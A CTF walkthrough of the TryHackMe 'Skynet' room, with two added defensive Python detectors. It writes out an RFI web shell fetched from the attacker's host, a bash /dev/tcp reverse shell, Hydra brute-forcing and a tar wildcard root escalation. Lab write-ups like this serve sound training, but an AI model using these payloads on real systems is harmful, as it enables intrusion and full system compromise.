Getting Back Into the Flow: A Full Walkthrough of "Skynet"

I haven’t touched TryHackMe or done any structured CTF work in quite a while, so I figured it was time to slowly get back into the game. I didn’t want to burn out immediately by picking some complex, frustration-heavy box, so I went looking for something familiar, linear, and ideally quick - and stumbled upon "Skynet."

The room sounded manageable and looked like a decent way to re-familiarize myself with some core techniques: enumeration, web fuzzing, some Samba recon, basic web exploitation, and classic privilege escalation. Nothing groundbreaking, but definitely enough to get the gears turning again.

Recon and Enumeration

I always start with full port coverage, especially if I haven’t touched the target before. That meant a full TCP scan with service detection:

nmap -sV -sC -p- -T4 10.10.209.141

That gave me a bunch of open ports to chew on:

  • 22 (SSH)
  • 80 (HTTP)
  • 110 (POP3)
  • 143 (IMAP)
  • 139, 445 (Samba)

The presence of POP3 and IMAP already hinted that this was probably mail-related in some way. HTTP is always worth looking at first, so I browsed to http://10.10.209.141 and landed on a custom Skynet-themed search engine. I ran Gobuster on it right away to dig deeper:

gobuster dir -u http://10.10.209.141/ -w /usr/share/wordlists/dirb/common.txt -x php,html,txt

This yielded some interesting results, including /squirrelmail/, a very dated-looking webmail client, and a couple of other directories like /config, /admin, and /logs, though most of them were forbidden.

Samba Enumeration and Password Discovery

Before diving into the webmail interface, I decided to check what Samba had to offer. Using:

smbclient -L //10.10.209.141 -N

I found a share named anonymous. That typically means it's accessible without credentials, so I connected:

smbclient //10.10.209.141/anonymous -N

Inside that share there were a few files; the one that stood out was attention.txt. It mentioned a recent system malfunction and stated that all Skynet employees needed to reset their passwords. The note was signed by "Miles Dyson," which seemed like a solid lead for a possible username.

Another file, log1.txt, contained what looked like a bunch of password guesses or attempts - all with some form of "terminator" in them. Here's a quick snippet of what was inside:

terminator22596
cyborg007haloterminator
exterminator95
terminator123!@#
...

Given I had a potential username (milesdyson) and what looked like a password list, I figured I’d try my luck logging into the /squirrelmail/ interface using just the browser.

Navigating to http://10.10.209.141/squirrelmail/, I landed on a basic login page. Inputting milesdyson as the username and cyborg007haloterminator as the password surprisingly worked on the first try. Pure luck, but I wasn’t complaining.

For those who aren’t lucky or want to automate this step, you could always use Hydra:

hydra -l milesdyson -P passwords.txt 10.10.209.141 http-post-form \
"/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:Unknown user or password incorrect"

Once logged in, I could browse the inbox. A message titled "Samba Password reset" caught my attention. The body of the message revealed a newly generated Samba password:

)s{A&2Z=F^n_E.B

Armed with that updated password and the known username, I attempted to access the private milesdyson SMB share:

smbclient //10.10.209.141/milesdyson -U milesdyson

I entered the new password from the mail, and access was granted.

Finding the CMS Path

Exploring this share revealed a mix of PDFs and a notes/ folder. Inside notes/, a file named important.txt stood out. It contained this:

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

The first line was clearly a breadcrumb to a hidden directory on the web server. Visiting http://10.10.209.141/45kra24zxs28v3yd/ brought up a new admin interface. I ran Gobuster again:

gobuster dir -u http://10.10.209.141/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt -x php

It revealed:

/administrator/
/administrator/alerts/alertConfigField.php

That last file looked interesting. A quick search confirmed that it belonged to Cuppa CMS and that it was vulnerable to Remote File Inclusion (RFI) via the urlConfig parameter.

I created a simple shell file on my attacker machine:

<?php system($_GET['cmd']); ?>

I hosted it with Python’s HTTP server:

python3 -m http.server 8000

Then I called it through the vulnerable URL like this:

curl "http://10.10.209.141/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.94.114:8000/shell.txt&cmd=id"

If everything worked, it would run the id command - and it did. I got back uid=33(www-data), confirming code execution.
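From the defender's side, the request above leaves a distinctive trace in the web server's access log. The following is an added example (not part of the original walkthrough) that scans constructed Apache-style log lines for RFI and traversal attempts against include-style parameters such as urlConfig, and notes when a cmd= parameter is chained onto the same request; the parameter-name hints and sample lines are assumptions for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache-style access-log lines (sample data, not a real capture).
# Line 1 mirrors the RFI request from the walkthrough, line 2 a traversal
# attempt on the same parameter, lines 3-4 are benign traffic.
SAMPLE_LOG = """\
10.10.94.114 - - [12/May/2025:10:01:02 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.94.114:8000/shell.txt&cmd=id HTTP/1.1" 200 512
10.10.94.114 - - [12/May/2025:10:01:05 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../etc/passwd HTTP/1.1" 200 2048
192.168.1.20 - - [12/May/2025:10:02:00 +0000] "GET /squirrelmail/src/login.php HTTP/1.1" 200 1337
192.168.1.21 - - [12/May/2025:10:02:30 +0000] "GET /search.php?q=http://example.com HTTP/1.1" 200 900
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Parameter names that typically feed include()/require()/file_get_contents().
INCLUDE_PARAM_HINT = re.compile(r'config|file|page|include|inc|template|path|dir|url', re.I)
REMOTE_RE = re.compile(r'^(https?|ftp)://', re.I)
TRAVERSAL_RE = re.compile(r'\.\./|\.\.\\|/etc/passwd|^php://|^data:', re.I)

def classify(target):
    """Return [(param, kind)] findings for one request target; kind is 'rfi' or 'lfi'."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if not INCLUDE_PARAM_HINT.search(name):
            continue  # 'q=http://...' on a search box is not an include sink
        if REMOTE_RE.match(value):
            findings.append((name, "rfi"))
        elif TRAVERSAL_RE.search(value):
            findings.append((name, "lfi"))
    return findings

def scan(log_text):
    """Scan access-log text; return one alert dict per suspicious request."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify(m["target"])
        if not findings:
            continue
        params = dict(parse_qsl(urlsplit(m["target"]).query))
        alerts.append({
            "ip": m["ip"], "status": int(m["status"]),
            "path": urlsplit(m["target"]).path, "findings": findings,
            # a chained cmd= parameter suggests the included file is a web shell
            "chained_cmd": "cmd" in params,
        })
    return alerts
```

Running scan(SAMPLE_LOG) yields two alerts for the alertConfigField.php requests and none for the benign lines; a 200 status on a flagged request is the cue to check what the server actually fetched.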

Reverse Shell and Privilege Escalation

To take full control, I upgraded from command execution to a reverse shell. I created this payload:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.94.114/4444 0>&1'"); ?>

I again hosted it with Python and set up a listener:

nc -lvnp 4444

I triggered the same vulnerable URL, and after a moment my netcat listener caught the reverse shell:

www-data@skynet:/$

Now I had an interactive shell on the box.

I grabbed the user flag from /home/milesdyson/user.txt, then started enumerating privilege escalation vectors. I ran:

sudo -l

But I had no sudo permissions. I checked for interesting cron jobs with:

cat /etc/crontab

This revealed:

*/1 * * * * root /home/milesdyson/backups/backup.sh

And the script looked like this:

#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

Ah, the classic tar wildcard privilege escalation. I used the --checkpoint-action technique to run code as root:

echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > root_script.sh
chmod +x root_script.sh

touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh root_script.sh'

I waited a minute, and:

/tmp/rootbash -p
whoami
root

Root access was achieved. The final flag was located in /root/root.txt.
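The fix for this privesc is in how backup.sh calls tar: archive a directory with -C and a literal "." (or end option parsing with --) instead of letting the shell expand * into file names. As an added example, not part of the original room or walkthrough, here is a small auditor that flags this pattern in cron-driven scripts; the hardened script and the crontab sample are constructed for illustration.

```python
import shlex

# Constructed samples, not from the original walkthrough: the room's backup
# script as quoted above, and a hardened rewrite that archives a directory
# rather than shell-expanded names, so '--checkpoint-action=...' stays data.
VULNERABLE_SCRIPT = """#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
"""
HARDENED_SCRIPT = "#!/bin/bash\ntar cf /home/milesdyson/backups/backup.tgz -C /var/www/html .\n"
CRONTAB = """\
# m h dom mon dow user  command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
"""

def tar_wildcard_findings(script_text):
    """(line_no, line) for each tar command handed an unquoted glob before any
    '--' terminator; the shell expands it to file names that tar parses as options."""
    findings = []
    for no, line in enumerate(script_text.splitlines(), 1):
        stripped = line.strip()
        try:
            argv = shlex.split(stripped, posix=False)  # keeps quotes visible
        except ValueError:
            continue  # unbalanced quotes: not a plain command line
        if stripped.startswith("#") or argv[:1] not in (["tar"], ["/bin/tar"]):
            continue
        for arg in argv[1:]:
            if arg == "--":
                break  # everything after '--' is a file name to tar
            if arg[0] not in "'\"" and set("*?[") & set(arg):
                findings.append((no, stripped))
                break
    return findings

def crontab_entries(crontab_text):
    """Yield (user, command) from /etc/crontab-style lines: 5 time fields, user, command."""
    for line in crontab_text.splitlines():
        parts = line.split(None, 6)
        if len(parts) == 7 and not parts[0].startswith("#"):
            yield parts[5], parts[6]

def audit(crontab_text, scripts):
    """scripts maps path -> content; list root-run scripts that expose the pattern."""
    report = []
    for user, command in crontab_entries(crontab_text):
        path = command.split()[0]
        if user == "root" and path in scripts:
            for no, line in tar_wildcard_findings(scripts[path]):
                report.append((user, path, no, line))
    return report
```

audit(CRONTAB, {"/home/milesdyson/backups/backup.sh": VULNERABLE_SCRIPT}) reports line 3 of the script; the hardened version produces no findings. The check is textual only: a root cron job that runs a script from a directory writable by a lower-privileged user is a problem regardless of how tar is invoked.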

Conclusion

Skynet was the right mix of easy enumeration, a few logical steps, and an old-school privesc vector. While most of the room was pretty linear, it still required tying different pieces together, from SMB access to webmail, from leaked passwords to hidden paths and RFI abuse.

What made it a bit tedious was the technical side: I ran into a few issues with the THM interface crashing and had to reboot the target VM a couple of times, which delayed testing the cronjob exploit.

Still, a fun room. Definitely a nice way to return to CTFs and get back in shape.